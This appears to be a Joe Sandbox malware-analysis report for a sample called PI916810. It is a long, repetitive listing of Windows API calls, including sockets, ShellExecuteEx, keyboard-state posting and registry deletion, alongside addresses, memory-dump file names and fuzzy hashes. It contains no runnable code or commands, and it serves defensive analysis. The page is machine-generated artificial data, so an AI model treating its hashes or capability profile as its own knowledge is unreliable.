                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                            • String ID: X
                                                                                                                                                                            • API String ID: 774024439-3081909835
                                                                                                                                                                            • Opcode ID: ed62b08df785ecdbc9153167ff695bcab81adc391d8ec54303489365be7426c0
                                                                                                                                                                            • Instruction ID: a347b3cbd8a74c297354c57a701fdd79c8df15559699b7516eccc479fd76266e
                                                                                                                                                                            • Opcode Fuzzy Hash: ed62b08df785ecdbc9153167ff695bcab81adc391d8ec54303489365be7426c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 85C160755043009FC754EF25C881E5AB7E4BF85318F04492EF899972A2EB78ED49CB8B
                                                                                                                                                                            APIs
                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 004D6F14
                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004D6F35
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D6F48
                                                                                                                                                                            • htons.WSOCK32(?), ref: 004D6FFE
                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 004D6FBB
                                                                                                                                                                              • Part of subcall function 004BAE14: _strlen.LIBCMT ref: 004BAE1E
                                                                                                                                                                              • Part of subcall function 004BAE14: _memmove.LIBCMT ref: 004BAE40
                                                                                                                                                                            • _strlen.LIBCMT ref: 004D7058
                                                                                                                                                                            • _memmove.LIBCMT ref: 004D70C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3619996494-0
                                                                                                                                                                            • Opcode ID: ed6e3ea77a5407bf5b3a4815691f29c75bbcb46321619ef58d8503586918150a
                                                                                                                                                                            • Instruction ID: 686e6fa88d60dd3e7691ffda7ada9d63f7bc3436f99897ef95eccd51fe50253b
                                                                                                                                                                            • Opcode Fuzzy Hash: ed6e3ea77a5407bf5b3a4815691f29c75bbcb46321619ef58d8503586918150a
                                                                                                                                                                            • Instruction Fuzzy Hash: C881FF31108300ABD710EF25CC95E6BB3A9AF84718F10491FF5459B3E2EB79AD05CB9A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 74c35cd3fcdb7aa6dc208653b27d45a4fb391d75935c43bd2010607e1d392f49
                                                                                                                                                                            • Instruction ID: 34b18cb07268bf439261535d38afe6d16c2a65034d20f0a724145f122b69273f
                                                                                                                                                                            • Opcode Fuzzy Hash: 74c35cd3fcdb7aa6dc208653b27d45a4fb391d75935c43bd2010607e1d392f49
                                                                                                                                                                            • Instruction Fuzzy Hash: D9718F70900109EFDB04CF54CC84ABFBB79FF85314F14815AF915AB261D738AA51CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindow.USER32(00D355D0), ref: 004EB6A5
                                                                                                                                                                            • IsWindowEnabled.USER32(00D355D0), ref: 004EB6B1
                                                                                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004EB795
                                                                                                                                                                            • SendMessageW.USER32(00D355D0,000000B0,?,?), ref: 004EB7CC
                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 004EB809
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000EC), ref: 004EB82B
                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004EB843
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                            • Opcode ID: c28c2081763742fd05e59fd91efefc014d073e29606566fdb8237da7fb43f352
                                                                                                                                                                            • Instruction ID: 8c6d15d21fde1be03b574301ba8591ffa360849640ac6806021c4059c3eed103
                                                                                                                                                                            • Opcode Fuzzy Hash: c28c2081763742fd05e59fd91efefc014d073e29606566fdb8237da7fb43f352
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C71C134600284AFDB209F66C8D4FAB7BB9FF49302F14046AE945973A1C739AD51CB99
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004DF75C
                                                                                                                                                                            • _memset.LIBCMT ref: 004DF825
                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 004DF86A
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 004DF8E1
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004DF910
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
APIs
• GetParent.USER32(?), ref: 004C149C
• GetKeyboardState.USER32(?), ref: 004C14B1
• SetKeyboardState.USER32(?), ref: 004C1512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004C1540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004C155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 004C15A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 004C15C8
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
APIs
• GetParent.USER32(00000000), ref: 004C12B5
• GetKeyboardState.USER32(?), ref: 004C12CA
• SetKeyboardState.USER32(?), ref: 004C132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004C1357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004C1374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004C13B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004C13D9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004BDAC5
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004BDAFB
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004BDB0C
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004BDB8E
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,O$DllGetClassObject
APIs
  • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004C38D3,?), ref: 004C48C7
  • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004C38D3,?), ref: 004C48E0
• lstrcmpiW.KERNEL32(?,?), ref: 004C38F3
• _wcscmp.LIBCMT ref: 004C390F
• MoveFileW.KERNEL32(?,?), ref: 004C3927
• _wcscat.LIBCMT ref: 004C396F
• SHFileOperationW.SHELL32(?), ref: 004C39DB
Strings
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
APIs
• _memset.LIBCMT ref: 004E7519
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E75C0
• IsMenu.USER32(?), ref: 004E75D8
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E7620
• DrawMenuBar.USER32 ref: 004E7633
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                                                                            • Opcode ID: d52951708c2afede844b65a175d1131fa290eab27c59e443bfc22bcd150c5d9b
                                                                                                                                                                            • Instruction ID: 595d2b857bba98eea9d1e5b8f6af6707224ef26bc29900853ec0a4ac5522ed84
                                                                                                                                                                            • Opcode Fuzzy Hash: d52951708c2afede844b65a175d1131fa290eab27c59e443bfc22bcd150c5d9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416A70A04688EFDB20DF65D884EAABBF8FF05325F04802AE9159B351D734AD05CF94
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004E125C
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E1286
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004E133D
                                                                                                                                                                              • Part of subcall function 004E122D: RegCloseKey.ADVAPI32(?), ref: 004E12A3
                                                                                                                                                                              • Part of subcall function 004E122D: FreeLibrary.KERNEL32(?), ref: 004E12F5
                                                                                                                                                                              • Part of subcall function 004E122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004E1318
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 004E12E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 395352322-0
                                                                                                                                                                            • Opcode ID: 1d8db7f272e226a8b7ed59aa34ab249af91085aee6b102321820ddec4435252f
                                                                                                                                                                            • Instruction ID: a557411ca81ecd302f5ca9173cf034f7b60b09013b12d5c189a09fa0a7a589bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8db7f272e226a8b7ed59aa34ab249af91085aee6b102321820ddec4435252f
                                                                                                                                                                            • Instruction Fuzzy Hash: F9314F71941149BFEB14DF91DC85AFFB7BCEF08301F00017AE901E2251D6745F499AA8
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E655B
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000F0), ref: 004E658E
                                                                                                                                                                            • GetWindowLongW.USER32(00D355D0,000000F0), ref: 004E65C3
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004E65F5
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004E661F
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004E6630
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004E664A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                            • Opcode ID: a098a940d2a48b8991f6ec4c5d75df15f166e6281d579bd3788386b822dd2ac6
                                                                                                                                                                            • Instruction ID: c074864c61cf3dad1b503ba2b0d3f4e9d0d13c3f17f54ec61ff47e800fef8f29
                                                                                                                                                                            • Opcode Fuzzy Hash: a098a940d2a48b8991f6ec4c5d75df15f166e6281d579bd3788386b822dd2ac6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A310530704290AFDB208F2AEC84F5637E1FB6A395F1A0169F5118F2B6CB65A845DB49
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004D80A0: inet_addr.WSOCK32(00000000), ref: 004D80CB
                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004D64D9
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004D64E8
                                                                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004D6521
                                                                                                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 004D652A
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 004D6534
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 004D655D
                                                                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004D6576
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 910771015-0
                                                                                                                                                                            • Opcode ID: 5c4676d9915013db965f0142058416fba7b4ee7344c85d23acfd5762b0e45491
                                                                                                                                                                            • Instruction ID: 1e613ab3ab59c3efcb4bf9edda3fa29b801ab62ec48c10f6e5c3bd606600b5db
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c4676d9915013db965f0142058416fba7b4ee7344c85d23acfd5762b0e45491
                                                                                                                                                                            • Instruction Fuzzy Hash: D231C131600118ABDB10AF64DC95BBE7BADEB44314F05806FFD059B391DB78AD48CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004BE0FA
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004BE120
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 004BE123
                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 004BE144
                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 004BE14D
                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 004BE167
                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004BE175
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                            • Opcode ID: 302400ec4da89838999196801bad62ecec9ae813c78d2bf6a46fdab8eb2edb82
                                                                                                                                                                            • Instruction ID: 452e47353e0023dbac09ce3c101ba14e02803658a42c354b7e5ab61e6081f02a
                                                                                                                                                                            • Opcode Fuzzy Hash: 302400ec4da89838999196801bad62ecec9ae813c78d2bf6a46fdab8eb2edb82
                                                                                                                                                                            • Instruction Fuzzy Hash: 9021A171600208AFDB10AFADDC88CEB77ECEB49760B108136F914CB2A1DA74DC458B78
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00461D73
                                                                                                                                                                              • Part of subcall function 00461D35: GetStockObject.GDI32(00000011), ref: 00461D87
                                                                                                                                                                              • Part of subcall function 00461D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00461D91
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004E78A1
                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004E78AE
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004E78B9
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004E78C8
                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004E78D4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                            • Opcode ID: ae0ff74e2ec6dd6dc68a22fd13f515ee504dd4ab7dba6826a901ec387a242a83
                                                                                                                                                                            • Instruction ID: 35850fbe7d4ba1d024f793a52dbbe99fa337e20bc81d1c993841cef048f39b05
                                                                                                                                                                            • Opcode Fuzzy Hash: ae0ff74e2ec6dd6dc68a22fd13f515ee504dd4ab7dba6826a901ec387a242a83
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E1190B2110219BFEF159F61CC85EE77F6DFF087A8F014115BA04A61A0C776AC21DBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00484292,?), ref: 004841E3
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004841EA
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 004841F6
                                                                                                                                                                            • DecodePointer.KERNEL32(00000001,00484292,?), ref: 00484213
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                            • String ID: RoInitialize$combase.dll
                                                                                                                                                                            • API String ID: 3489934621-340411864
                                                                                                                                                                            • Opcode ID: c03269bc41a7aba7f47063d996b28b121bc92fd32260d476850fc41c80b94529
                                                                                                                                                                            • Instruction ID: 7922241906ad5424682c09d576e0d4c30a1213c048f8169110e2b11d2194038f
                                                                                                                                                                            • Opcode Fuzzy Hash: c03269bc41a7aba7f47063d996b28b121bc92fd32260d476850fc41c80b94529
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E012B0590B45DEDB206B70EC4DB153594BB71B02F504835B911D91E1D7B944AADF08
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004841B8), ref: 004842B8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004842BF
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 004842CA
                                                                                                                                                                            • DecodePointer.KERNEL32(004841B8), ref: 004842E5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                                                                            • Opcode ID: 78c775a0c15682f02ec0e498bdc309af79c2eecc0b9ee055aab87b4c272e0993
                                                                                                                                                                            • Instruction ID: dda16cbe53ddcbf2a27a1731d272311830862267cf3f70d8eca523c5e7ef04da
                                                                                                                                                                            • Opcode Fuzzy Hash: 78c775a0c15682f02ec0e498bdc309af79c2eecc0b9ee055aab87b4c272e0993
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE04678681305ABEB20AB20ED4DB153AA4BB25782F20843AF500E91A1CBB84559EF0C
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3253778849-0
